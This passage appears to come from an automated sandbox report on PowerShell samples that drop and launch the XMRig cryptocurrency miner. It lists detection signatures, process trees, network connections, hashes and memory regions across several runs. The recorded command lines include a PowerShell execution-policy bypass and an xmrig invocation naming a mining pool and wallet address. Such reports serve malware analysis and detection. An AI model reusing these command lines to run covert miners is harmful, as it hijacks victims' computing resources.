| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2180 wrote to memory of 3500 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2180 wrote to memory of 3500 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/2180-0-0x00007FFE06133000-0x00007FFE06135000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5xydlrv5.r2q.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2180-9-0x00000288D3950000-0x00000288D3972000-memory.dmp
memory/2180-10-0x00007FFE06130000-0x00007FFE06BF2000-memory.dmp
memory/2180-11-0x00007FFE06130000-0x00007FFE06BF2000-memory.dmp
memory/2180-12-0x00007FFE06130000-0x00007FFE06BF2000-memory.dmp
memory/2180-14-0x00000288D3E60000-0x00000288D3E72000-memory.dmp
memory/2180-15-0x00000288D3B30000-0x00000288D3B3A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3500-46-0x000001D7A2FD0000-0x000001D7A2FF0000-memory.dmp
memory/3500-47-0x000001D7A3010000-0x000001D7A3030000-memory.dmp
memory/3500-48-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/2180-49-0x00007FFE06133000-0x00007FFE06135000-memory.dmp
memory/3500-52-0x000001D7A3050000-0x000001D7A3070000-memory.dmp
memory/3500-51-0x000001D7A3030000-0x000001D7A3050000-memory.dmp
memory/2180-50-0x00007FFE06130000-0x00007FFE06BF2000-memory.dmp
memory/3500-53-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-54-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-55-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-56-0x000001D7A3030000-0x000001D7A3050000-memory.dmp
memory/3500-57-0x000001D7A3050000-0x000001D7A3070000-memory.dmp
memory/3500-58-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-59-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-60-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-61-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-62-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-63-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-64-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-65-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-66-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-67-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-68-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-69-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-70-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-71-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-72-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-73-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-74-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-75-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-76-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-77-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-78-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-79-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-80-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-81-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-82-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-83-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-84-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-85-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-86-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-87-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-88-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-89-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-90-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-91-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-92-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-93-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-94-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-95-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-96-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-97-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-98-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-99-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-100-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-101-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-102-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-103-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-104-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-105-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-106-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-107-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-108-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-109-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-110-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-111-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-112-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-113-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-114-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-115-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-116-0x00007FF734930000-0x00007FF735563000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 06:42
Platform
win10v2004-20240508-en
Max time kernel
1788s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1916 wrote to memory of 2996 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1916 wrote to memory of 2996 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.73.42.20.in-addr.arpa | udp |
Files
memory/1916-0-0x00007FFA6CFD3000-0x00007FFA6CFD5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zz142yi1.vix.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1916-1-0x000002E7171A0000-0x000002E7171C2000-memory.dmp
memory/1916-11-0x00007FFA6CFD0000-0x00007FFA6DA91000-memory.dmp
memory/1916-12-0x00007FFA6CFD0000-0x00007FFA6DA91000-memory.dmp
memory/1916-14-0x00007FFA6CFD0000-0x00007FFA6DA91000-memory.dmp
memory/1916-15-0x000002E730260000-0x000002E730272000-memory.dmp
memory/1916-16-0x000002E72FF00000-0x000002E72FF0A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2996-47-0x000002973E640000-0x000002973E660000-memory.dmp
memory/2996-48-0x000002973E890000-0x000002973E8B0000-memory.dmp
memory/2996-49-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-50-0x000002973E8B0000-0x000002973E8D0000-memory.dmp
memory/2996-51-0x000002973E8D0000-0x000002973E8F0000-memory.dmp
memory/2996-52-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/1916-53-0x00007FFA6CFD3000-0x00007FFA6CFD5000-memory.dmp
memory/1916-54-0x00007FFA6CFD0000-0x00007FFA6DA91000-memory.dmp
memory/2996-55-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/1916-56-0x00007FFA6CFD0000-0x00007FFA6DA91000-memory.dmp
memory/2996-57-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-58-0x000002973E8B0000-0x000002973E8D0000-memory.dmp
memory/2996-59-0x000002973E8D0000-0x000002973E8F0000-memory.dmp
memory/2996-60-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-61-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-62-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-63-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-64-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-65-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-66-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-67-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-68-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-69-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-70-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-71-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-72-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-73-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-74-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-75-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-76-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-77-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-78-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-79-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-80-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-81-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-82-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-83-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-84-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-85-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-86-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-87-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-88-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-89-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-90-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-91-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-92-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-93-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-94-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-95-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-96-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-97-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-98-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-99-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-100-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-101-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-102-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-103-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-104-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-105-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-106-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-107-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-108-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-109-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-110-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-111-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-112-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-113-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-114-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-115-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-116-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-117-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
memory/2996-118-0x00007FF6C1AD0000-0x00007FF6C2703000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:00
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1777s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4208 wrote to memory of 2720 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4208 wrote to memory of 2720 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/4208-0-0x00007FF8CEBF3000-0x00007FF8CEBF5000-memory.dmp
memory/4208-1-0x0000019FB2290000-0x0000019FB22B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vqaouu4b.owp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4208-11-0x00007FF8CEBF0000-0x00007FF8CF6B1000-memory.dmp
memory/4208-12-0x00007FF8CEBF0000-0x00007FF8CF6B1000-memory.dmp
memory/4208-14-0x00007FF8CEBF0000-0x00007FF8CF6B1000-memory.dmp
memory/4208-15-0x0000019FB2CE0000-0x0000019FB2CF2000-memory.dmp
memory/4208-16-0x0000019FB2CD0000-0x0000019FB2CDA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
